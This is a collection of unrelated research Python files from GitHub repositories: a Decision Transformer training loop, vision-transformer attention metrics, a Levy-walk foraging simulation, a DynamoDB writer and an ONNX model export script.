rtg[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), rtg[-1]], axis=1) / scale
timesteps[-1] = np.concatenate([np.zeros((1, max_len - tlen)), timesteps[-1]], axis=1)
mask.append(np.concatenate([np.zeros((1, max_len - tlen)), np.ones((1, tlen))], axis=1))
s = torch.from_numpy(np.concatenate(s, axis=0)).to(dtype=torch.float32, device=device)
a = torch.from_numpy(np.concatenate(a, axis=0)).to(dtype=torch.float32, device=device)
r = torch.from_numpy(np.concatenate(r, axis=0)).to(dtype=torch.float32, device=device)
d = torch.from_numpy(np.concatenate(d, axis=0)).to(dtype=torch.long, device=device)
rtg = torch.from_numpy(np.concatenate(rtg, axis=0)).to(dtype=torch.float32, device=device)
timesteps = torch.from_numpy(np.concatenate(timesteps, axis=0)).to(dtype=torch.long, device=device)
mask = torch.from_numpy(np.concatenate(mask, axis=0)).to(device=device)
return s, a, r, d, rtg, timesteps, mask
# def get_batch(batch_size=256, max_len=K):
# batch_inds = np.random.choice(
# np.arange(num_trajectories),
# size=batch_size,
# replace=True,
# p=p_sample, # reweights so we sample according to timesteps
# )
#
# s, a, r, d, rtg, timesteps, mask = [], [], [], [], [], [], []
# for i in range(batch_size):
# traj = sequences[int(sorted_inds[batch_inds[i]])]
# si = random.randint(0, traj['rewards'].shape[0] - 1)
#
# # get sequences from dataset
# s.append(traj['states'][si:si + max_len].reshape(1, -1, state_dim))
# a.append(traj['actions'][si:si + max_len].reshape(1, -1, act_dim))
# r.append(traj['rewards'][si:si + max_len].reshape(1, -1, 1))
# if 'terminals' in traj:
# d.append(traj['terminals'][si:si + max_len].reshape(1, -1))
# else:
# d.append(traj['dones'][si:si + max_len].reshape(1, -1))
# timesteps.append(np.arange(si, si + s[-1].shape[1]).reshape(1, -1))
# timesteps[-1][timesteps[-1] >= max_ep_len] = max_ep_len - 1 # padding cutoff
# rtg.append(discount_cumsum(traj['rewards'][si:], gamma=1.)[:s[-1].shape[1] + 1].reshape(1, -1, 1))
# if rtg[-1].shape[1] <= s[-1].shape[1]:
# rtg[-1] = np.concatenate([rtg[-1], np.zeros((1, 1, 1))], axis=1)
#
# # padding and state + reward normalization
# tlen = s[-1].shape[1]
# s[-1] = np.concatenate([np.zeros((1, max_len - tlen, state_dim)), s[-1]], axis=1)
# s[-1] = (s[-1] - state_mean) / state_std
# a[-1] = np.concatenate([np.ones((1, max_len - tlen, act_dim)) * -10., a[-1]], axis=1)
# r[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), r[-1]], axis=1)
# d[-1] = np.concatenate([np.ones((1, max_len - tlen)) * 2, d[-1]], axis=1)
# rtg[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), rtg[-1]], axis=1) / scale
# timesteps[-1] = np.concatenate([np.zeros((1, max_len - tlen)), timesteps[-1]], axis=1)
# mask.append(np.concatenate([np.zeros((1, max_len - tlen)), np.ones((1, tlen))], axis=1))
#
# s = torch.from_numpy(np.concatenate(s, axis=0)).to(dtype=torch.float32, device=device)
# a = torch.from_numpy(np.concatenate(a, axis=0)).to(dtype=torch.float32, device=device)
# r = torch.from_numpy(np.concatenate(r, axis=0)).to(dtype=torch.float32, device=device)
# d = torch.from_numpy(np.concatenate(d, axis=0)).to(dtype=torch.long, device=device)
# rtg = torch.from_numpy(np.concatenate(rtg, axis=0)).to(dtype=torch.float32, device=device)
# timesteps = torch.from_numpy(np.concatenate(timesteps, axis=0)).to(dtype=torch.long, device=device)
# mask = torch.from_numpy(np.concatenate(mask, axis=0)).to(device=device)
#
# return s, a, r, d, rtg, timesteps, mask
def eval_episodes(target_rew):
def fn(model):
returns, lengths, crashes = [], [], []
for _ in range(num_eval_episodes):
with torch.no_grad():
ret, length, crash = evaluate_episode_rtg(
config['env'],
state_dim,
act_dim,
model,
state_mean=state_mean,
state_std=state_std,
device=device,
target_return=target_rew,
render=config['eval_render'],)
returns.append(ret)
lengths.append(length)
crashes.append(crash)
return {
f'target_{target_rew}_return_mean': np.mean(returns),
f'target_{target_rew}_return_std': np.std(returns),
f'target_{target_rew}_length_mean': np.mean(lengths),
f'target_{target_rew}_length_std': np.std(lengths),
f'target_{target_rew}_not_crashed (out of {num_eval_episodes} runs)': np.sum(crashes),
}
return fn
print("state_dim:", state_dim, " act_dim:", act_dim, " K:", K, " max_ep_len:", max_ep_len, " scale:", scale)
model = DecisionTransformer(
state_dim=state_dim,
act_dim=act_dim,
max_length=K,
max_ep_len=max_ep_len,
action_tanh=config['action_tanh'],
hidden_size=config['embed_dim'],
n_layer=config['n_layer'],
n_head=config['n_head'],
state_encoder=config.get('state_encoder', None),
in_shape=config.get('in_shape', None),
n_inner=4 * config['embed_dim'],
activation_function=config['activation_function'],
n_positions=1024,
resid_pdrop=config['dropout'],
attn_pdrop=config['dropout'],
)
optimizer = torch.optim.AdamW(
model.parameters(),
lr=config['learning_rate'],
weight_decay=config['weight_decay'],
)
if continue_training:
model.load_state_dict(config['model'])
optimizer.load_state_dict(config['optimizer'])
else:
model = model.to(device=device)
warmup_steps = config['warmup_steps']
scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer,
lambda steps: min((steps+1)/warmup_steps, 1)
)
trainer = SequenceTrainer(
model=model,
optimizer=optimizer,
batch_size=batch_size,
get_batch=get_batch,
scheduler=scheduler,
loss_fn=config['loss_fn'],
eval_fns=[eval_episodes(tar) for tar in config['env_targets']],
err_fn=config['err_fn']
)
if config['log_to_wandb']:
wandb.init(
name=config["experiment_name"],
group=config["group_name"],
project='highway-decision-transformer',
config={}#config
)
# wandb.watch(model) # wandb has some bug
count_parameters(model)
max_ret = 0
for iteration in range(config['max_iters']):
outputs = trainer.train_iteration(num_steps=config['num_steps_per_iter'], iter_num=iteration+1, print_logs=True)
eval_rets = [outputs[f'evaluation/target_{target_rew}_return_mean'] for target_rew in config['env_targets']]
mean_ret = np.mean(eval_rets)
if mean_ret > max_ret:
max_ret = mean_ret
if config['log_highest_return']:
print("Saving model with highest mean return so far", mean_ret)
checkpoint = {
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
}
torch.save(checkpoint, f'saved_models/best-{round(max_ret, 2)}-checkpoint-{config["experiment_name"]}.pth')
if iteration%10 == 0 and iteration > 0:
checkpoint = {
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
}
torch.save(checkpoint, f'saved_models/iter-{iteration}-checkpoint-{config["experiment_name"]}.pth')
if config['log_to_wandb']:
wandb.log(outputs)
return model, optimizer, scheduler
| caixunshiren/Highway-Decision-Transformer | pipelines/train_dt.py | train_dt.py | py | 15,371 | python | en | code | 15 | github-code | 90 |
24028142293 | """
###########################################################################
Collection of metrics for transformers, designed to be computed
incrementally over batches
Written by: Matthew Walmer
###########################################################################
"""
import matplotlib.pyplot as plt
import torch
import numpy as np
from cka.utils import cluster_metric
########################################
# track the average attention distance per head, based on the attention distance metric proposed in
# "Do Vision Transformers See Like Convolutional Neural Networks" (Raghu et al.)
class AttentionDistance():
def __init__(self, debug=False):
self.metric_name = 'avg-att-dist'
self.results = []
self.distance_template = None
self.edge_len = None
self.debug = debug
self.device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
# treat tokens as existing on a [0,1] square. convert their
# integer position to a spatial position
def convert_to_xy(self, i):
x = i % self.edge_len
y = int((i-x)/self.edge_len)
x /= (self.edge_len - 1)
y /= (self.edge_len - 1)
return x, y
# pre-calculate distanced between all token pairs treat tokens as existing on a [0,1]
# square, requires a square patch grid
def prep_distance_template(self, attentions):
if self.distance_template is not None:
return
print('Preparing Distance Template')
att = attentions[:,:,:,1:,1:] # Remove CLS token
self.edge_len = int(np.sqrt(att.shape[3]))
if self.edge_len * self.edge_len != att.shape[3] or self.edge_len * self.edge_len != att.shape[4]:
print('ERROR: attention distance requires square token layout')
exit(-1)
nt = att.shape[3]
convert_template = np.zeros([nt, 2])
for i in range(nt):
x, y = self.convert_to_xy(i)
convert_template[i,:] = [x, y]
distance_template = torch.zeros([nt, nt])
for i in range(nt):
xy = convert_template[i,:]
d = convert_template - xy
d = np.square(d)
d = np.sum(d, axis=1)
d = np.sqrt(d)
distance_template[i,:] = torch.from_numpy(d)
if self.debug: # visualize distance maps
pos_sel = [0, 30, 1770, 3570, 3599]
for p in pos_sel:
dis = distance_template[p,:]
dis = dis.reshape(edge_len, edge_len).cpu().numpy()
fname = 'debug_%i.png'%p
plt.imsave(fname=fname, arr=dis, format='png')
self.distance_template = distance_template.unsqueeze(0).unsqueeze(0).unsqueeze(0).to(self.device)
def add(self, attentions, labels):
self.prep_distance_template(attentions)
att = attentions[:,:,:,1:,1:] # Remove CLS token
att_sum = torch.sum(att, dim=4, keepdim=True)
# handle empty case (all att on cls token)
att_nul = (att_sum == 0).to(torch.long)
att_sum += att_nul
att = att / att_sum
d = torch.sum(att * self.distance_template, dim=4)
d = torch.mean(d, dim=3)
self.results.append(d.cpu().numpy())
def get_results(self):
return np.concatenate(self.results, axis=0)
########################################
class PositionDeviation():
def __init__(self):
self.metric_name = 'stdev-over-token-pos'
self.results = []
def add(self, attentions, labels):
att = attentions[:,:,:,1:,1:] # Remove CLS token
d = torch.std(att, dim=3)
d = torch.mean(d, dim=3)
self.results.append(d.cpu().numpy())
def get_results(self):
return np.concatenate(self.results, axis=0)
########################################
class SpatialCLSAttention():
def __init__(self):
self.metric_name = 'spatial-cls-att'
self.results = []
def add(self, attentions, labels):
att = attentions[:,:,:,1:,1] # Remove CLS token, and observe only CLS attention pos
v = torch.mean(att, dim=3)
self.results.append(v.cpu().numpy())
def get_results(self):
return np.concatenate(self.results, axis=0)
########################################
# determine if the sparse attention patterns in the late layers of CLIP and TIMM
# encode semantic "shortcuts" by using the patterns directly as features and running
# semantic cluster purity analysis. This metric is still experimental
class AttentionPatternShortcuts():
def __init__(self):
self.metric_name = 'att-pat-shortcuts'
self.att_pats = []
self.labs = []
def add(self, attentions, labels):
bs = attentions.shape[0]
for i in range(bs):
# att = attentions[i,:,:,1:,1:] # remove CLS token
att = attentions[i,...] # dont't remove CLS token
att = torch.mean(att, dim=2) # average spatial source potions
# option 1: focus on a single head to test the hypothesis
# att = att[-2, 0, :]
# option 2: average per-block
att = att[-2, :, :]
att = torch.mean(att, dim=0)
# store attention patterns and labels
self.att_pats.append(att.cpu().numpy())
self.labs.append(labels[i].cpu())
def get_results(self):
att_pats = np.stack(self.att_pats, axis=0)
all_labs = np.array(self.labs)
print(att_pats.shape)
print(all_labs.shape)
print('running clustering analysis')
nmi, ari, pur = cluster_metric(50, att_pats, all_labs)
exit()
return None
# return np.concatenate(self.results, axis=0)
########################################
'''
average amount of attention ON each token
also equivalent to averaging all attention maps over
the source-token dimension. Runs in 4 modes:
all - average attention of all source tokens
cls - take only the cls token
spc - take only the spatial tokens
spcpure - take only the spatial tokens and remove
cls token as a destination token (normalize
for the lost attention mass)
aggregated maps include the cls token in the
set of destination-tokens, which can then be
included or excluded in further plots
'''
class AvgAttentionOnToken():
def __init__(self, mode='all'):
assert mode in ['all', 'cls', 'spc', 'spcpure']
if mode == 'all':
self.metric_name = 'avg-att-on-token'
else:
self.metric_name = 'avg-%s-att-on-token'%mode
self.mode = mode
self.average_acc = None
self.count = 0
def add(self, attentions, labels):
self.count += attentions.shape[0]
if self.mode == 'all':
attentions = torch.mean(attentions, dim=3)
elif self.mode == 'spc':
attentions = attentions[:,:,:,1:,:]
attentions = torch.mean(attentions, dim=3)
elif self.mode == 'spcpure':
attentions = attentions[:,:,:,1:,:] # remove source-cls-token
attentions[:,:,:,:,0] = 0 # remove all attention on CLS tokens
att_sum = torch.sum(attentions, dim=4, keepdim=True)
# handle and track empty case (all att on cls token)
att_nul = (att_sum == 0).to(torch.long)
att_sum += att_nul
attentions = attentions / att_sum # normalize for removed attention mass
attentions = torch.mean(attentions, dim=3)
else: # cls
attentions = attentions[:,:,:,0,:]
avg_att = torch.sum(attentions, dim=0)
avg_att = avg_att.cpu().numpy()
if self.average_acc is None:
self.average_acc = avg_att
else:
self.average_acc += avg_att
def get_results(self):
return self.average_acc / self.count
########################################
'''
Measure the average attention positions of all spatial tokens, but now
the heat maps are shifted so the current token is always aligned with
the center. CLS token is removed and the maps are normalized to account
for the lost attention mass.
Closest match in AvgAttentionOnToken would be spcpure mode, since this
method remove the cls token completely and normalizes for the lost mass
Tf the original token grid is KxK, the output of this method will be
(2K-1)x(2K-1).
'''
class AvgAlignedAttentionOnToken():
def __init__(self):
self.metric_name = 'avg-aligned-att-on-token'
self.edge_len = None
self.c = None
self.average_acc = None
self.count = 0
# track null events (all attention on CLS token)
self.null_count = 0
self.null_imgc = 0
self.null_tracker = None
# convert direct token idx to i,j coordinates (i=down, j=across)
def convert_to_ij(self, idx):
j = idx % self.edge_len
i = int((idx-j)/self.edge_len)
return i, j
def add(self, attentions, labels):
# Remove CLS token from source and destination, and normalize for lost attention mass
att = attentions[:,:,:,1:,1:]
att_sum = torch.sum(att, dim=4, keepdim=True)
# handle and track empty case (all att on cls token)
att_nul = (att_sum == 0).to(torch.long)
nul_img = (torch.sum(att_nul, dim=(1,2,3,4)) > 0)
self.null_count += torch.sum(att_nul)
self.null_imgc += torch.sum(nul_img)
if self.null_tracker is None:
self.null_tracker = torch.sum(att_nul, dim=(0,4))
else:
self.null_tracker += torch.sum(att_nul, dim=(0,4))
att_sum += att_nul
# normalize for removed attention mass
att = att / att_sum
# square-ify the token grid
if self.edge_len is None:
self.edge_len = int(np.sqrt(att.shape[3]))
if self.edge_len * self.edge_len != att.shape[3] or self.edge_len * self.edge_len != att.shape[4]:
print('ERROR: attention distance requires square token layout')
exit(-1)
att_sq = torch.reshape(att, [att.shape[0], att.shape[1], att.shape[2], att.shape[3], self.edge_len, self.edge_len]).cpu().numpy()
# initialize attention maps with padding
if self.average_acc is None:
w = (self.edge_len * 2) - 1
self.average_acc = np.zeros([att.shape[1], att.shape[2], w, w], dtype=att_sq.dtype)
# accumulate
for idx in range(att.shape[3]):
cur = att_sq[:, :, :, idx, :, :]
cur = np.sum(cur, axis=0)
i, j = self.convert_to_ij(idx)
e = self.edge_len
self.average_acc[:,:,e-i-1:e-i-1+e,e-j-1:e-j-1+e] += cur
self.count += 1
def get_results(self):
if self.null_count > 0:
print('Null Report:')
print('avg-aligned-att-on-token')
print('null count: %i'%self.null_count)
print('null images: %i'%self.null_imgc)
print('null tokens: %i'%torch.sum(self.null_tracker > 0))
print('null heads:')
print(torch.sum(self.null_tracker, dim=2))
return self.average_acc / self.count
########################################
# average amount of attention ON each token separated by image class, to test if some heads/tokens
# are sensitive to particular object classes
class AvgAttentionOnTokenPerClass():
def __init__(self, num_class=50):
self.metric_name = 'avg-att-on-token-per-class'
self.average_accs = {}
self.counts = {}
self.nc = num_class
for i in range(self.nc):
self.average_accs[i] = None
self.counts[i] = 0
def add(self, attentions, labels):
b = attentions.shape[0]
for i in range(b):
l = int(labels[i])
avg_att = attentions[i,...]
avg_att = torch.mean(avg_att, dim=2)
avg_att = avg_att.cpu().numpy()
if self.average_accs[l] is None:
self.average_accs[l] = avg_att
else:
self.average_accs[l] += avg_att
self.counts[l] += 1
def get_results(self):
temp = self.average_accs[0]
nb = temp.shape[0]
nh = temp.shape[1]
nt = temp.shape[2]
ret = np.zeros([self.nc, nb, nh, nt], dtype=temp.dtype)
for i in range(self.nc):
ret[i,...] = self.average_accs[i] / self.counts[i]
return ret
########################################
# measure standard deviation over heads, a per-block metric
class HeadDeviation():
def __init__(self):
self.metric_name = 'stdev-over-head'
self.results = []
def add(self, attentions, labels):
att = attentions[:,:,:,1:,1:] # Remove CLS token
d = torch.std(att, dim=2)
d = torch.mean(d, dim=2)
d = torch.mean(d, dim=2)
self.results.append(d.cpu().numpy())
def get_results(self):
return np.concatenate(self.results, axis=0)
########################################
# POST PROCESSING METRICS
########################################
# Metrics that are derived by directly post-processing the results of other metrics
# typically reducing lower-level metrics to higher-level metrics
# take the per-class average attention maps and compute the average stdev over class
# input is the result of AvgAttentionOnTokenPerClass
def deviation_by_class(result):
res = np.std(result, axis=0, keepdims=True)
res = np.mean(res, axis=3)
return res
# take in the result for 'avg-aligned-att-on-token' and compute the average center
# of attention for each block and the average offset distance
def average_att_offset(result):
nb = result.shape[0]
nh = result.shape[1]
nt = result.shape[2]
# distance templates
dtx = np.zeros([nt, nt])
dty = np.zeros([nt, nt])
for i in range(nt):
v = 2 * (float(i)/(nt-1)) - 1
dtx[:,i] = v
dty[i,:] = v
# compute average centers
cx = np.zeros([nb, nh])
cy = np.zeros([nb, nh])
d = np.zeros([nb, nh])
for b in range(nb):
for h in range(nh):
# make sure heat map sums to 1
# special case: if attention is fully on CLS token, cannot divide by zero
att = result[b,h,...]
div = np.sum(att)
if div > 0:
att /= np.sum(att)
cxbh = np.sum(np.multiply(att, dtx))
cybh = np.sum(np.multiply(att, dty))
d[b,h] = np.linalg.norm(np.array([cxbh, cybh]))
cx[b,h] = cxbh
cy[b,h] = cybh
return d, cx, cy | mwalmer-umd/vit_analysis | analysis/attention_metrics.py | attention_metrics.py | py | 15,075 | python | en | code | 31 | github-code | 90 |
41392218806 | import numpy as np
from scipy.stats import levy_stable
import scipy
import math
import random
import levy
from matplotlib import pyplot
def create_seascape_uniform(seascape_length, seascape_width, patches):
patch_count = len(patches)
patch_length = len(patches[0])
if(seascape_length % patch_length != 0 or seascape_width % patch_length !=0):
raise Exception("Seascape length and width must both be dividable by patch length")
seascape = np.zeros((seascape_length, seascape_width))
x = random.randint(0, seascape_width-100) #Initial patch placements
y = random.randint(0, seascape_length-100)
for patch in patches:
#print(patch.shape, x, y)
y2 = 0
for y1 in range(y, y + patch_length): #This is to replace the values with the values generated from the patch generator
x2 = 0
for x1 in range(x, x+patch_length):
if(x1 >= seascape_width): #Torus properties
x1 -= seascape_width
if(y1 >= seascape_length):
y1 -= seascape_length
seascape[y1][x1] = seascape[y1][x1] + patch[y2][x2] #Update cell value
x2+=1
y2+=1
ang = random.randint(-360,360)
step = np.random.uniform(low=1, high=seascape_length)
step *= np.random.choice([1,-1], p=[.5,.5])
xstep = int(step * math.cos(math.radians(ang)))
ystep = int(step * math.sin(math.radians(ang)))
newposy = int(y + ystep)
newposx = int(x + xstep)
if(newposy >= seascape_length - 1):
newposy = newposy - seascape_length - 1
if(newposy < 0):
newposy = newposy + seascape_length - 1
if(newposx >= seascape_width - 1):
newposx = newposx - seascape_width - 1
if(newposx < 0):
newposx = newposx + seascape_width - 1
y = newposy
x = newposx
#print(seascape)
return seascape
def create_seascape_levy_1(seascape_length, seascape_width, patches):
patch_count = len(patches)
patch_length = len(patches[0])
if(seascape_length % patch_length != 0 or seascape_width % patch_length !=0):
raise Exception("Seascape length and width must both be dividable by patch length")
seascape = np.zeros((seascape_length, seascape_width))
x = random.randint(0, seascape_width-1)
y = random.randint(0, seascape_length-1)
a = np.array(range(50,2500))
prob = levy.levy(a, 1, 0)
stepsorig = [random.choices(a, weights=prob) for x in range(patch_count)]
steps = [np.random.choice([1,-1], p=[.5,.5]) * x[0] for x in stepsorig]
print(steps)
for patch in patches:
#print(patch.shape, x, y)
y2 = 0
for y1 in range(y, y + patch_length): #This is to replace the values with the values generated from the patch generator
x2 = 0
for x1 in range(x, x+patch_length):
if(x1 >= seascape_width): #Torus properties
x1 -= seascape_width
if(y1 >= seascape_length):
y1 -= seascape_length
seascape[y1][x1] = seascape[y1][x1] + patch[y2][x2] #Update cell value
x2+=1
y2+=1
ang = random.randint(-360,360)
xstep = int(steps[i] * math.cos(math.radians(ang)))
ystep = int(steps[i] * math.sin(math.radians(ang)))
newposy = int(y + ystep)
newposx = int(x + xstep)
if(newposy >= seascape_length - 1):
newposy = newposy - seascape_length - 1
if(newposy < 0):
newposy = newposy + seascape_length - 1
if(newposx >= seascape_width - 1):
newposx = newposx - seascape_width - 1
if(newposx < 0):
newposx = newposx + seascape_width - 1
y = newposy
x = newposx
#print(seascape)
return seascape
def create_seascape_levy_2(seascape_length, seascape_width, patches):
patch_count = len(patches)
patch_length = len(patches[0])
if(seascape_length % patch_length != 0 or seascape_width % patch_length !=0):
raise Exception("Seascape length and width must both be dividable by patch length")
seascape = np.zeros((seascape_length, seascape_width))
x = random.randint(0, seascape_width-1)
y = random.randint(0, seascape_length-1)
i=0
a = np.array(range(1,2500))
prob = levy.levy(a, 1, 0, sigma=200)
steps = [random.choices(a, weights=prob) for x in range(patch_count)]
positions=[]
#steps = [np.random.choice([1,-1], p=[.5,.5]) * x[0] for x in stepsorig]
#print(steps)
#print(steps)
for patch in patches:
#print(patch.shape, x, y)
y2 = 0
for y1 in range(y, y + patch_length): #This is to replace the values with the values generated from the patch generator
x2 = 0
for x1 in range(x, x+patch_length):
if(x1 >= seascape_width): #Torus properties
x1 -= seascape_width
if(y1 >= seascape_length):
y1 -= seascape_length
seascape[y1][x1] = seascape[y1][x1] + patch[y2][x2] #Update cell value
x2+=1
y2+=1
ang = random.randint(-360,360)
xstep = int(steps[i][0] * math.cos(math.radians(ang)))
ystep = int(steps[i][0] * math.sin(math.radians(ang)))
newposy = int(y + ystep)
newposx = int(x + xstep)
#print((xstep,ystep),(newposx,newposy), steps[i][0])
if(newposy >= seascape_length - 1):
newposy = newposy - seascape_length - 1
if(newposy < 0):
newposy = newposy + seascape_length - 1
if(newposx >= seascape_width - 1):
newposx = newposx - seascape_width - 1
if(newposx < 0):
newposx = newposx + seascape_width - 1
y = newposy
x = newposx
i+=1
#print(seascape)
#print(positions)
return seascape
def generate_patch(patch_length):
patch = np.zeros((patch_length,patch_length))
req_area = (patch_length**2)
big_l = int(req_area**.5)
hit = 0
while(hit < req_area):
pos=(50,50)
l = big_l
a = np.array(np.concatenate((range(int(-patch_length/4),0), range(0,int(patch_length/4))))) #concat range of min and max values + and -
prob = scipy.stats.norm(0, 7).pdf(np.concatenate((range(int(-patch_length/4),0), range(0,int(patch_length/4))))) #get probability distribution for walk
xsteps = [random.choices(a, weights=prob) for x in range(big_l)] #get x displacement
ysteps = [random.choices(a, weights=prob) for y in range(big_l)] #get y displacement
for i in range(big_l):
newposy = int(pos[0] + ysteps[i][0])
newposx = int(pos[1] + xsteps[i][0])
if(newposy >= 100):
newposy = newposy - 100
elif(newposy < 0):
newposy = newposy + 100
if(newposx >= 100):
newposx = newposx - 100
elif(newposx < 0):
newposx = newposx + 100
pos = (newposy, newposx)
if(patch[pos[0]][pos[1]] == 0):
patch[pos[0]][pos[1]] = l
hit += 1
l -= 1
return patch
def reward(levy_sea, walk):
reward = 0
while(True):
pos=np.random.randint(len(levy_sea))
for x in range(len(walk)):
if(walk[x] < 0):
for y in range(walk[x], 0):
reward += levy_sea[pos][x]
pos-=1
if(pos<0):
pos+=2500
else:
for y in range(walk[x]):
reward += levy_sea[pos][x]
pos+=1
if(pos >= 2500):
pos-=2500
if(reward >= 0):
break
return reward
def random_walk(N):
stepsorig = np.random.randint(1, 14, size=N)
steps = [np.random.choice([1,-1], p=[.5,.5]) * x for x in stepsorig]
#print(len(steps))
return steps
def levy_walk(N):
a = np.array(range(1,2500))
prob = levy.levy(a, 1, 0)
stepsorig = [random.choices(a, weights=prob) for x in range(N)]
steps = [np.random.choice([1,-1], p=[.5,.5]) * x[0] for x in stepsorig]
#print(len(steps))
return steps
def walk_to_position(random_walk): #This function takes a random walk as it's parameter, and returns a torus bouded positon list
pos=[]
for i in range(len(random_walk)):
if(i == 0): #First position is a random depth
y = random_walk[i]
if(y >= 2500): #Torus
y -= 2500
if(y < 0):#Torus
y+=2500
pos.append(y)#Add Initial position
else:
y = random_walk[i] + pos[i-1]
if(y >= 2500):
y -= 2500
if(y < 0):
y+=2500
pos.append(y)
return pos
def generate_seascapes_random(scope, patches):
seascapes = []
for i in range(scope):
seascape_uniform = create_seascape_uniform(2500,5000, patches)
seascapes.append(seascape_uniform)
return seascapes
def generate_seascapes_levy(scope, patches):
seascapes_ll = []
for i in range(scope):
seascape_levy = create_seascape_levy_2(2500,5000, patches)
seascapes_ll.append(seascape_levy)
return seascapes_ll
def generate_random_walks(scope, step_count):
walks = []
positions = []
for i in range(scope):
steps = random_walk(step_count)
walks.append(steps)
positions.append(walk_to_position(steps))
return walks, positions
def generate_levy_walks(scope, step_count):
walks = []
positions = []
for i in range(scope):
steps = levy_walk(step_count)
walks.append(steps)
positions.append(walk_to_position(steps))
return walks, positions
def get_consumptions(seascapes, walks):
arr_consumption = []
for seascape in seascapes:
for walk in walks:
consumption = reward(seascape, walk)
arr_consumption.append(consumption/np.sum(np.abs(walk)))
return arr_consumption
def find_upper_uniform_bound(walks_levy):
diffarr = []
print("Levy_walk length: " + str(np.sum(np.abs(walks_levy))))
best_diff = 99999999
best_index = 0
for p in range(10,25):
walks_random = []
for i in range(len(walks_levy)):
steps_r = np.random.randint(1, p, size=5000)
walks_random.append(steps_r)
print(np.sum(np.abs(walks_random)))
diff= np.sum(np.abs(walks_levy)) - np.sum(np.abs(walks_random))
if(abs(diff) < best_diff):
best_diff = diff
best_index = p
diffarr.append(diff)
return best_index, diffarr, best_diff
if __name__ == "__main__":
num_patches = int(input("Enter the number of prey patches: "))
patches = [generate_patch(100) for x in range(num_patches)]
print("patches")
num_levy_seascapes = int(input("Enter the number of Levy seascapes: "))
levy_seascapes = generate_seascapes_levy(num_levy_seascapes, patches)
print("1 done")
num_levy_walks = int(input("Enter number of Levy walk generations: "))
levy_walks, levy_positions = generate_levy_walks(num_levy_walks,5000)
print("2 done")
num_random_seascapes = int(input("Enter the number of random seascapes: "))
random_seascapes = generate_seascapes_random(num_random_seascapes, patches)
print("3 done")
num_random_walks = int(input("Enter number of random walk generations: "))
random_walks, random_positions = generate_random_walks(num_random_walks,5000)
print("4 done")
arr_consumption_new_ll = get_consumptions(levy_seascapes, levy_walks)
print("5")
arr_consumption_new_lr = get_consumptions(random_seascapes, levy_walks)
print("6")
arr_consumption_new_rl = get_consumptions(levy_seascapes, random_walks)
print(7)
arr_consumption_new_rr = get_consumptions(random_seascapes, random_walks)
pyplot.hist(arr_consumption_new_ll)
pyplot.savefig('hist_LL.jpg')
print("Mean: " + str(np.mean(arr_consumption_new_ll)))
print("Median: " + str(np.median(arr_consumption_new_ll)))
pyplot.hist(arr_consumption_new_lr)
pyplot.savefig('hist_LR.jpg')
print("Mean: " + str(np.mean(arr_consumption_new_lr)))
print("Median: " + str(np.median(arr_consumption_new_lr)))
pyplot.hist(arr_consumption_new_rl)
pyplot.savefig('hist_RL.jpg')
print("Mean: " + str(np.mean(arr_consumption_new_rl)))
print("Median: " + str(np.median(arr_consumption_new_rl)))
pyplot.hist(arr_consumption_new_rr)
pyplot.savefig('hist_RR.jpg')
print("Mean: " + str(np.mean(arr_consumption_new_rr)))
print("Median: " + str(np.median(arr_consumption_new_rr)))
pyplot.imshow(levy_seascapes[0])
pyplot.savefig('levy_seascape.jpg')
fig, ax1 = pyplot.subplots(figsize=(21, 10))
ax2 = ax1.twinx()
ax3 = ax1.twinx()
pyplot.xlabel("Time Step")
pyplot.ylabel("Depth")
seascape_index = np.random.choice(len(levy_seascapes))
ax1.imshow(levy_seascapes[seascape_index])
random_position_index = np.random.choice(len(random_positions))
ax2.plot(random_positions[random_position_index], lw=2, color='#0492C2')
levy_position_index = np.random.choice((len(levy_positions)))
ax3.plot(levy_positions[levy_position_index], lw=2, color='#B8C2B2')
pyplot.savefig('interpolated_seascape.jpg')
#print(reward(seascapes[1], randomwalk), reward(seascapes_ll[3], levywalk))
pyplot.show() | ViggyC/4314Project | simulation_python.py | simulation_python.py | py | 13,704 | python | en | code | 1 | github-code | 90 |
32969094354 | import json
import boto3
import uuid
with open('C:/Users/David/PycharmProjects/FinalYearProject/project4-Davey1993/json/predictions.json') as data_file:
data = json.load(data_file)
#print(data)
myUUID = str(uuid.uuid4())
dynamodb = boto3.resource('dynamodb', region_name='eu-west-1')
dynamoTable = dynamodb.Table('predictionsTable')
dynamoTable.put_item(
Item={
"id": myUUID,
"awayTeamScore": data['awayTeamScore'],
"homeTeam": data['homeTeam'],
"homeTeamScore": data['awayTeamScore'],
"awayTeam": data['awayTeam']
})
| Davey1993/FYP | dynamoDB/dataWriter.py | dataWriter.py | py | 577 | python | en | code | 0 | github-code | 90 |
39745172077 |
import torchaudio
import torch
import numpy as np
from mysegment import MySegment
opsetVer = 17
outModel = 'segment.onnx'
def export():
# Create dummy input
#audio = '/home/leo/storage/sharedFolderVirtualbox/audioForTesting/shortTeaching2.wav'
audio = '/home/leo/storage/sharedFolderVirtualbox/audioForTesting/multi-speaker_4-speakers_Jennifer_Aniston_and_Adam_Sandler_talk.wav'
signal, fs = torchaudio.load( audio )
print( signal.shape )
self.model = Model.from_pretrained(
"pyannote/segmentation@2022.07",
strict=False,
use_auth_token=hf_auth_token,
)
self.model.eval()
self.model.to( torch.device( 'cuda' ))
model = MySegment()
# Show all unconvertable ops, output would be like,
# {'aten::view_as_real', 'aten::chunk', 'aten::stft'}
#torch_script_graph, unconvertible_ops = torch.onnx.utils.unconvertible_ops(
# model, signal, opset_version=opsetVer
#)
#if( len( unconvertible_ops ) > 0 ):
# print( '------------------------There are some unconvertable operations-----------' )
# print(set(unconvertible_ops))
# exit( 0 )
#print( '---- all operations convertable ----' )
# Export the model
print( '\n---- start export ----' )
symbolic_names = {0: "batch_size", 1: "max_seq_len"}
torch.onnx.export(model, # model being run
signal, # model input (or a tuple for multiple inputs)
outModel, # where to save the model (can be a file or file-like object)
export_params=True, # store the trained parameter weights inside the model file
opset_version=opsetVer, # the ONNX version to export the model to
do_constant_folding=True, # whether to execute constant folding for optimization
verbose=False,
input_names = ['signal'], # the model's input names
output_names = ['segments'], # the model's output names
dynamic_axes={'signal' : symbolic_names, # variable length axes
})
print( f'---- model has been saved to {outModel} ----\n' )
export()
